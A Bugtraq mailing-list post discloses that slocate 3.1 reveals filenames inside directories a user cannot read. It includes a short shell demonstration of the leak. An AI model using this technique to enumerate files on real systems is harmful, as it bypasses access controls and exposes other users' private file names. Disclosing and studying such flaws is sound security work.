[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

slocate leaks filenames of protected directories

To: bugtraq@xxxxxxxxxxxxxxxxx
Subject: slocate leaks filenames of protected directories
From: steven@xxxxxxxxxxxxxxxx
Date: 10 Jan 2007 01:29:35 -0000

* Version tested: 3.1

* Problem description: slocate doesn't check readability bit of containing 
directory. It can divulge the existence of files in a directory that is 
unreadable (e.g. by the 'ls' command) by a user.

* Demonstration:

As user1:

$ cd /tmp
$ mkdir dir
$ chmod 711 dir
$ cd dir
$ touch "a-secret-file"
$ cd ..

$ updatedb -o db -U dir

As user2:

$ cd /tmp
$ ls dir
ls: .: Permission denied

But:

$ slocate -d db file
dir/a-secret-file

Prev by Date: iDefense Security Advisory 01.09.07: Adobe Macromedia ColdFusion Source Code Disclosure Vulnerability
Next by Date: Adobe Reader Remote Heap Memory Corruption - Subroutine Pointer Overwrite
Previous by thread: iDefense Security Advisory 01.09.07: Adobe Macromedia ColdFusion Source Code Disclosure Vulnerability
Next by thread: Re: slocate leaks filenames of protected directories
Index(es):
- Date
- Thread